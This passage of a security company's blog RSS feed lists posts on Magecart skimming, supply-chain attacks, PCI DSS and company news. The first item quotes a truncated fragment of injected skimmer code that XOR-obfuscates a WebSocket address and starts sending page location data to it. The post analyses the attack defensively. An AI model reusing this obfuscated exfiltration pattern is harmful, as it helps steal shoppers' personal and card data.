isPermaLink="true">https://cside.com/blog/new-magecart-attack-code-revealed</guid><description>On October 14th, we posted an article on how another Magento Magecart attack was taking place. Then we only noticed one script as the culprit. Today, we were able to find and analyze the attack in more detail. The attack decoded This was the injected code: &lt;script&gt; const qbq = [93,89,89,16,5,5,77,89,94,75,94,70,73,4,69,88,77,5,64,67,92,69,21,89,69,95,88,73,79,23]; const zep = 42; window.sss = new WebSocket(String.fromCharCode(...qbq.map(hwo =&gt; hwo ^ zep)) + encodeURIComponent(location.h</description><pubDate>Wed, 23 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/new-magecart-attack-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>How web extensions can hurt your site (INFIRC[.]com and INFIRD[.]com)</title><link>https://cside.com/blog/how-web-extensions-can-hurt-your-site-infirc-and-infird</link><guid isPermaLink="true">https://cside.com/blog/how-web-extensions-can-hurt-your-site-infirc-and-infird</guid><description>The domain infirc[.]com and infird[.]com have caused quite the stir recently, and highlighted the dangers of infected or malicious web exten</description><pubDate>Fri, 18 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/web-extensions-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>The Internet Archive Hack: How JavaScript fits in the picture</title><link>https://cside.com/blog/the-internet-archive-hack-how-javascript-fits-in-the-picture</link><guid isPermaLink="true">https://cside.com/blog/the-internet-archive-hack-how-javascript-fits-in-the-picture</guid><description>The Internet Archive, also known as The Wayback Machine, experienced a security breach yesterday. This was not the first time it had been ta</description><pubDate>Fri, 18 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/the-internet-archive-hack-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>The biggest Magecart attacks in history (so far)</title><link>https://cside.com/blog/the-biggest-magecart-attacks-in-history-so-far</link><guid isPermaLink="true">https://cside.com/blog/the-biggest-magecart-attacks-in-history-so-far</guid><description>Where the term “Magecart” comes from from Magecart attacks are a type of cyberattack where hackers inject malicious JavaScript code, often r</description><pubDate>Thu, 17 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/the-biggest-magecart-attacks-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>New TTPs in Stealing PII and Financial Information from Magento Websites</title><link>https://cside.com/blog/new-ttps-in-stealing-pii-and-financial-information-from-magento-websites</link><guid isPermaLink="true">https://cside.com/blog/new-ttps-in-stealing-pii-and-financial-information-from-magento-websites</guid><description>At cside, we actively monitor client-side supply chain attacks, with a focus on the evolving tactics, techniques, and procedures (TTPs) used by threat actors. One of the most common attacks we&apos;ve observed over the past few months is the targeting of eCommerce websites built on the Magento framework. In particular, we&apos;ve been closely following the Cosmic Sting attack (CVE-2024-34102), which has been widely reported, including by Sansec (https://sansec.io/research/cosmicsting). Recent TTP Obser</description><pubDate>Mon, 14 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/websockets-found-stealing-pii-image-coverr-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Why do websites need 3rd party scripts?</title><link>https://cside.com/blog/why-do-websites-need-3rd-party-scripts</link><guid isPermaLink="true">https://cside.com/blog/why-do-websites-need-3rd-party-scripts</guid><description>When developing a website, you’ll often include libraries to help speed up the development process, and avoid reinventing the wheel. However</description><pubDate>Thu, 10 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/websites-need-3rd-party-scripts-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>cside joins the PCI Security Standards Council as an Associate Participating Organization</title><link>https://cside.com/blog/cside-joins-the-pci-security-standards-council-associate-participating-organization</link><guid isPermaLink="true">https://cside.com/blog/cside-joins-the-pci-security-standards-council-associate-participating-organization</guid><description>We’re proud to announce that we&apos;ve joined the Payment Card Industry Security Standards Council (PCI SSC) as an Associate Participating Organization. The PCI SSC leads a global, cross-industry effort to enhance payment security by establishing flexible, industry-driven data security standards. Through collaboration with other industry leaders, the Council’s mission is to protect payment data from emerging threats and meet the evolving needs of the payment ecosystem. As an Associate Participatin</description><pubDate>Mon, 07 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/cside-joins-pci-ssc-image-cover.webp" length="0" type="image/webp"/></item><item><title>Carlsberg a target in Magento “CosmicSting” malware attack</title><link>https://cside.com/blog/carlsberg-a-target-in-magento-cosmicsting-malware-attack</link><guid isPermaLink="true">https://cside.com/blog/carlsberg-a-target-in-magento-cosmicsting-malware-attack</guid><description>The term “Magecart” refers to attacks on the Magento platform. Recently, another large campaign was found to target Magento sites again. Among these, Carlsberg was one of the compromised websites. The pattern of these attacks is almost always the same. A single line of JavaScript loads content from a remote website. In other words, a 3rd party script. That code is then heavily obfuscated to delay detection even more. In this case, the payment process was quietly changed. A fake payment method</description><pubDate>Fri, 04 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/carlsberg-a-target-image-cover.webp" length="0" type="image/webp"/></item><item><title>cside joins the W3C</title><link>https://cside.com/blog/cside-joins-the-w3c</link><guid isPermaLink="true">https://cside.com/blog/cside-joins-the-w3c</guid><description>We’re incredibly proud to announce we have joined the W3C Web Application Security Working Group. The mission of the Web Application Security Working Group is to develop mechanisms and best practices to improve the security of web applications. Our whole team has been involved in cybersecurity for years. Through cside, we now aim to raise awareness and set higher standards for client-side security. By joining forces, we are one step closer to achieving both of our goals. We want to publicly t</description><pubDate>Fri, 04 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/cside-joins-w3c-image-cover--2--converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Kuwait ecommerce site is being used to facilitate client-side skimming attacks</title><link>https://cside.com/blog/kuwait-ecommerce-site-is-being-used-to-facilitate-client-side-skimming-attacks</link><guid isPermaLink="true">https://cside.com/blog/kuwait-ecommerce-site-is-being-used-to-facilitate-client-side-skimming-attacks</guid><description>A popular e-commerce site in Kuwait, running an outdated version of Magento (2.4), has been compromised by a malicious JavaScript injection,</description><pubDate>Thu, 03 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/website-being-used-image-cover.webp" length="0" type="image/webp"/></item><item><title>Threat feeds fail to detect attack for +2 years</title><link>https://cside.com/blog/threat-feeds-fail-to-detect-attack-for-over-2-years</link><guid isPermaLink="true">https://cside.com/blog/threat-feeds-fail-to-detect-attack-for-over-2-years</guid><description>On this website, we can see it’s been active since August of 2022. We&apos;ve notified this, and other websites of this attack.</description><pubDate>Wed, 02 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/threat-feeds-image-cover.webp" length="0" type="image/webp"/></item><item><title>Why do developers obfuscate JavaScript?</title><link>https://cside.com/blog/why-do-developers-obfuscate-javascript</link><guid isPermaLink="true">https://cside.com/blog/why-do-developers-obfuscate-javascript</guid><description>As a client-side security company protecting JavaScript, we see a lot of obfuscated scripts. When you use our tool, you can actually see the deobfuscated version of the scripts to see what it is doing. Deobfuscation has been around for a while, but why is code obfuscated in the first place? JavaScript obfuscation came around to protect the source code of web applications from being easily understood, copied, or exploited by unauthorized users. Obfuscation as a concept predates JavaScript and e</description><pubDate>Tue, 01 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/why-developers-obfuscate-image-cover.webp" length="0" type="image/webp"/></item><item><title>ButterCMS unreported downtime and security concerns</title><link>https://cside.com/blog/buttercms-unreported-downtime-and-security-concerns</link><guid isPermaLink="true">https://cside.com/blog/buttercms-unreported-downtime-and-security-concerns</guid><description>ButterCMS is a popular tool used to manage content for blogs. Earlier this week, we noticed a potentially severe security incident which tri</description><pubDate>Mon, 23 Sep 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/buttercms-image-cover.webp" length="0" type="image/webp"/></item><item><title>cside raises a $6m seed round</title><link>https://cside.com/blog/cside-raises-a-6m-seed-round</link><guid isPermaLink="true">https://cside.com/blog/cside-raises-a-6m-seed-round</guid><description>We’re incredibly proud to announce our seed round of $6m, just six months after raising our pre-seed of $1.7m. Led by Uncork Capital as the lead, with participation from Mantis and PrimeSet. We also welcome back Scribble VC and Roar Ventures who supported us in the pre-seed. Together with this news, we’ve opened up our free tier to all. You can now sign up and start using cside to monitor, secure, and optimize 3rd party scripts. We founded cside to put client-side security on the map. For t</description><pubDate>Mon, 16 Sep 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/6-million-dollar-seed-round-image-cover.webp" length="0" type="image/webp"/></item><item><title>Cisco client-side Magecart JavaScript attack</title><link>https://cside.com/blog/cisco-client-side-magecart-javascript-attack</link><guid isPermaLink="true">https://cside.com/blog/cisco-client-side-magecart-javascript-attack</guid><description>Another day, another high-profile client-side JavaScript attack. This morning, we read that Cisco is the next victim of malicious code being</description><pubDate>Fri, 06 Sep 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/cisco-client-side-image-cover.webp" length="0" type="image/webp"/></item><item><title>cside picked for TechCrunch Disrupt Startup Battlefield 2024</title><link>https://cside.com/blog/cside-picked-for-techcrunch-disrupt-startup-battlefield-2024</link><guid isPermaLink="true">https://cside.com/blog/cside-picked-for-techcrunch-disrupt-startup-battlefield-2024</guid><description>We’re incredibly proud to announce that we were selected for TechCrunch Disrupt Startup Battlefield in 2024. This year’s Startup Battlefield participants span artificial intelligence (AI), software as a service (SaaS), fintech, security, sustainability, space exploration, and more. Out of thousands of startups, just 200 make the cut, and we are absolutely thrilled to be among this select group. We can not wait to share our product with the world, Oct. 28 - Wed, Oct. 30 at Moscone West in San F</description><pubDate>Thu, 05 Sep 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2024/11/CsideSelectedForTCDisrupt.webp" length="0" type="image/webp"/></item><item><title>How to speed up JavaScript</title><link>https://cside.com/blog/how-to-speed-up-javascript</link><guid isPermaLink="true">https://cside.com/blog/how-to-speed-up-javascript</guid><description>Conversion rates are correlated with site loading speeds. But e-commerce sites have a ton of JavaScript which slows things down... the solution is here.</description><pubDate>Mon, 02 Sep 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/how-to-speedup-javascript-image-cover.webp" length="0" type="image/webp"/></item><item><title>What are digital skimmers?</title><link>https://cside.com/blog/what-are-digital-skimmers</link><guid isPermaLink="true">https://cside.com/blog/what-are-digital-skimmers</guid><description>Recently, we read of a new significant cyberattack campaign that targeted hundreds of online stores, exploiting vulnerabilities in third-party scripts and plugins. This is a perfect example of a ‘digital skimmer’. Digital skimmers are snippets of code maliciously injected into legitimate websites. They target personal and credit card information. This problem is on the rise and is part of the reason cside was created. Our proxy is able to detect this malicious code and prevent it from affecti</description><pubDate>Thu, 29 Aug 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/example-of-digital-skimmers-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Why browsers are becoming increasingly more dangerous</title><link>https://cside.com/blog/why-the-browsers-becomes-increasingly-more-dangerous</link><guid isPermaLink="true">https://cside.com/blog/why-the-browsers-becomes-increasingly-more-dangerous</guid><description>Technologies like WebAssembly (WASM), WebGPU, and IndexedDB have transformed what browsers can achieve. This evolution has expanded the func</description><pubDate>Fri, 23 Aug 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/why-browsers-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>The true cost of a cyber attack</title><link>https://cside.com/blog/the-true-cost-of-a-cyber-attack</link><guid isPermaLink="true">https://cside.com/blog/the-true-cost-of-a-cyber-attack</guid><description>Calculating the true cost of a cyber attack is difficult. None are the same. Yet we report on this in as much detail as possible to accurately represent the full picture of when this happens to your business.</description><pubDate>Mon, 12 Aug 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/the-true-costs-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Is Tuaw a scam in the making?</title><link>https://cside.com/blog/is-tuaw-a-scam-in-the-making</link><guid isPermaLink="true">https://cside.com/blog/is-tuaw-a-scam-in-the-making</guid><description>When we saw the new Fireship video yesterday, we were immediately reminded of the recent Polyfill attack. Our first article was picked up an</description><pubDate>Fri, 02 Aug 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2024/11/TheCostOfACyberattack-1.jpg" length="0" type="image/jpeg"/></item><item><title>The Copay event-stream attack illustrates dependency risks</title><link>https://cside.com/blog/the-copay-event-stream-attack-illustrates-dependency-risks</link><guid isPermaLink="true">https://cside.com/blog/the-copay-event-stream-attack-illustrates-dependency-risks</guid><description>The JavaScript ecosystem experienced a significant shock with a sophisticated attack on Copay, a popular cryptocurrency wallet provider, in November 2018. Known as the event-stream attack, this incident highlighted the critical vulnerabilities associated with relying on third-party dependencies in software development. Copay is now known as Bitpay Wallet. Understanding the attack Event-stream, a popular npm package, was widely utilized by numerous projects for efficiently managing streams</description><pubDate>Mon, 29 Jul 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/04/the-copay-event-stream-attack-dependency-risks.webp" length="0" type="image/webp"/></item><item><title>The Segway cyber attack explained</title><link>https://cside.com/blog/the-segway-cyber-attack-explained</link><guid isPermaLink="true">https://cside.com/blog/the-segway-cyber-attack-explained</guid><description>In January 2022, the Segway web store suffered a web supply chain attack - also often referred to as a Magecart attack. In these types of attacks, malicious JavaScript code is added that loads from the client-side, known as third-party scripts. Many common tools are third-party scripts. Things like analytics, captchas and more. But this avenue can also be used for malicious reasons, as was the case here. In this attack on Segway, their store is set up on Magento. The attackers targeted vulnera</description><pubDate>Thu, 25 Jul 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/the-segway-cyber-attack-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Don&apos;t deploy scripts site-wide</title><link>https://cside.com/blog/dont-deploy-scripts-site-wide</link><guid isPermaLink="true">https://cside.com/blog/dont-deploy-scripts-site-wide</guid><description>Third-party scripts are often deployed site-wide, typically injected in the head tags in web frameworks like Next.js via the ’_document.js’ file. This widespread implementation, while convenient for developers and often recommended by onboarding guides, means these scripts run across the entire site. This is simpler to implement, but it also introduces security risks and performance issues that are often overlooked. The recent Kaiser Permanente data leak shows the dangers of having poorly manag</description><pubDate>Mon, 22 Jul 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/04/dont-deploy-scripts-site-wide.webp" length="0" type="image/webp"/></item><item><title>What is an attack vector and what are hidden ones</title><link>https://cside.com/blog/what-is-an-attack-vector-and-what-are-hidden-ones</link><guid isPermaLink="true">https://cside.com/blog/what-is-an-attack-vector-and-what-are-hidden-ones</guid><description>An attack vector in cybersecurity is the way an attacker takes advantage of security weaknesses. Some are more obscure than others. One that’s been our focus is third-party JavaScript. Since these scripts are installed by the website owner yet executed in the visitors&apos; browsers, they&apos;re in a unique position. If something malicious occurs within these scripts, neither party is aware. The visitor is affected, and the website owner becomes liable. We’ve seen this too many times, for example, the</description><pubDate>Mon, 15 Jul 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/04/what-is-an-attack-vector-and-hidden-ones.webp" length="0" type="image/webp"/></item><item><title>Web supply chain attack through trojanized jQuery on npm, GitHub and CDNs</title><link>https://cside.com/blog/web-supply-chain-attack-through-trojanized-jquery-on-npm-github-and-cdns</link><guid isPermaLink="true">https://cside.com/blog/web-supply-chain-attack-through-trojanized-jquery-on-npm-github-and-cdns</guid><description>Attacks have been found in trojanized jQuery on GitHub, npm and jsDelivr in a new web supply chain attack. Each package had a copy of jQuery</description><pubDate>Tue, 09 Jul 2024 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/size/w1000/2024/11/MaliciousScriptOnJsDelivr-cside.dev.webp" length="0" type="image/webp"/></item><item><title>How expired domains lead to cyber attacks</title><link>https://cside.com/blog/how-expired-domains-lead-to-cyber-attacks</link><guid isPermaLink="true">https://cside.com/blog/how-expired-domains-lead-to-cyber-attacks</guid><description>How Expired Domains Lead to Cybersecurity Attacks In 2018, British Airways was attacked through the exploitation of a third-party JavaScript</description><pubDate>Mon, 08 Jul 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/04/how-expired-domains-lead-to-cyber-attacks.webp" length="0" type="image/webp"/></item><item><title>The Polyfill attack explained</title><link>https://cside.com/blog/the-polyfill-attack-explained</link><guid isPermaLink="true">https://cside.com/blog/the-polyfill-attack-explained</guid><description>A tampered JavaScript file injected by the polyfill[.]io domain redirected a percentage of users to adult and betting websites based on their User-Agent. A Japanese X user “piyokango” was likely the first to report his attack on the 24th of June.</description><pubDate>Wed, 03 Jul 2024 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/the-polyfill-attack-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>What is the browser supply chain?</title><link>https://cside.com/blog/what-is-the-browser-supply-chain</link><guid isPermaLink="true">https://cside.com/blog/what-is-the-browser-supply-chain</guid><description>cside is a cybersecurity product that lives in the browser supply chain space. We and other vendors operating here like to talk about that supply chain. But, what exactly do we mean by it? The browser supply chain is the combination of components and processes that come together to render web pages, execute scripts, and ensure smooth functionality. This supply chain includes everything from the initial request for a webpage to the final rendering of that page in a user&apos;s browser. As well as dyn</description><pubDate>Tue, 02 Jul 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/04/what-is-the-browser-supply-chain.webp" length="0" type="image/webp"/></item><item><title>More than 490k websites targeted in web supply chain attack</title><link>https://cside.com/blog/more-than-100k-websites-targeted-in-web-supply-chain-attack</link><guid isPermaLink="true">https://cside.com/blog/more-than-100k-websites-targeted-in-web-supply-chain-attack</guid><description>The cdn.polyfill[.]io domain is being used in a web supply chain attack. We were first to report the real scale: more than 490,000 affected websites.</description><pubDate>Tue, 25 Jun 2024 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/more-than-490k-websites-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>The BrowseAloud Supply-Chain Attack: A Case Study in Cryptojacking</title><link>https://cside.com/blog/the-browsealoud-supply-chain-attack-a-case-study-in-cryptojacking</link><guid isPermaLink="true">https://cside.com/blog/the-browsealoud-supply-chain-attack-a-case-study-in-cryptojacking</guid><description>This attack affected more than 4,000 websites, including government and educational sites, exposing thousands of users to cryptojacking without their knowledge.</description><pubDate>Mon, 10 Jun 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/04/the-browsealoud-supply-chain-attack-cryptojacking.webp" length="0" type="image/webp"/></item><item><title>Supply Chain Risk Doesn’t End At NPM</title><link>https://cside.com/blog/supply-chain-attacks-doesnt-end-at-npm</link><guid isPermaLink="true">https://cside.com/blog/supply-chain-attacks-doesnt-end-at-npm</guid><description>By only checking NPM (or another registry), you’re not protected from attacks through third-party scripts.</description><pubDate>Thu, 30 May 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2024/11/ClientSideSecurityIsNotJustNPM.jpg" length="0" type="image/jpeg"/></item><item><title>Ticketmaster Data Breach Déjà Vu: What You Need to Know</title><link>https://cside.com/blog/ticketmaster-data-breach-deja-vu-what-you-need-to-know</link><guid isPermaLink="true">https://cside.com/blog/ticketmaster-data-breach-deja-vu-what-you-need-to-know</guid><description>Yesterday on May 29, 2024, news broke of an alleged data breach involving Ticketmaster, a prominent ticket sales and distribution company. Ticketmaster has confirmed unauthorized activity within a third-party cloud database environment, claiming to have exposed the personal information of over 500 million customers. This breach includes sensitive data such as emails, phone numbers, addresses, and financial details. ShinyHunters, a notorious attacker, reposted the breach . According to reports,</description><pubDate>Thu, 30 May 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2024/11/TicketmasterAttack.jpg" length="0" type="image/jpeg"/></item><item><title>Kaiser Permanente Data Leak: A Case of Miscommunication and Inadequate Disclosure</title><link>https://cside.com/blog/kaiser-permanente-data-leak-a-case-of-miscommunication-and-inadequate-disclosure</link><guid isPermaLink="true">https://cside.com/blog/kaiser-permanente-data-leak-a-case-of-miscommunication-and-inadequate-disclosure</guid><description>On April 29th, healthcare giant Kaiser Permanente disclosed a data leak impacting 13.4 million current and former insurance members. The incident was rooted in improperly managed 3rd party scripts. The Incident Kaiser Permanente used tracking codes to monitor how its members navigated through its website and mobile applications. Some of these pages contained sensitive healthcare data, leading to the 3rd party scripts inadvertently transmitted information to third-party vendors they weren’t</description><pubDate>Sat, 25 May 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2024/11/KaiserPermanenteBreach.jpg" length="0" type="image/jpeg"/></item><item><title>Threat Feeds In The AI Era</title><link>https://cside.com/blog/are-threat-feeds-still-good-in-2024</link><guid isPermaLink="true">https://cside.com/blog/are-threat-feeds-still-good-in-2024</guid><description>The idea behind threat feeds is valid. But, we’d argue it’s past its prime at this point. And with where technology is today, there are better options. Threat feeds are (often) a list of community-sourced security information. When someone notices a vulnerability, they’ll put out a notice to the thread feed manually. It then gets picked up, and featured in the feed where security folk at their respective companies read it and check their own systems to see if they are prone to potential danger.</description><pubDate>Sun, 28 Apr 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/threat-feeds-2024-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>The 2021 cdnjs Vulnerability in Detail</title><link>https://cside.com/blog/the-2021-cdnjs-vulnerability</link><guid isPermaLink="true">https://cside.com/blog/the-2021-cdnjs-vulnerability</guid><description>Verifying that your 3rd party script sources are reputable is important. But that alone may not be enough. That’s what the world learned in 2021, when a massive vulnerability in Cloudlfare’s cdnjs was flagged. Here’s the rundown of what, and how, it happened. Cdnjs is one of the most commonly used JavaScript Content Delivery Networks (CDNs) of today. Over 12% of all websites on the internet inject at least one script through cdnjs. A researcher with the screen name ‘RyotaK’ shared a supply cha</description><pubDate>Sun, 28 Apr 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2024/11/CDNJSVulnerability.jpg" length="0" type="image/jpeg"/></item><item><title>The risk of only protecting your payment portals from 3rd party javascript attacks</title><link>https://cside.com/blog/the-risk-of-only-protecting-your-payment-portals</link><guid isPermaLink="true">https://cside.com/blog/the-risk-of-only-protecting-your-payment-portals</guid><description>PCI DSS 4.0 is here. By March 2025, it mandates that payment portals need to have a way to authorize each script on payment pages. Websites need to maintain an inventory of all scripts (on those payment portals at least) and ensure their integrity. You now need to detect and respond to unauthorized modifications on payment pages, including changes to HTTP headers and page contents. Organizations must check these configurations at least once every seven days or as determined by their risk analysi</description><pubDate>Mon, 15 Apr 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/dont-just-protect-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>PCI DSS 4.0.1 complete guide and steps</title><link>https://cside.com/blog/pci-dss-4-0-complete-guide-and-steps</link><guid isPermaLink="true">https://cside.com/blog/pci-dss-4-0-complete-guide-and-steps</guid><description>PCI DSS 4.0 complete guide and steps The Payment Card Industry Data Security Standard (PCI DSS) is a set of guidelines that ensures the safe</description><pubDate>Mon, 04 Mar 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/11/PCI-DSS-4.0.1-Complete-Guide---Steps.png" length="0" type="image/png"/></item></channel></rss>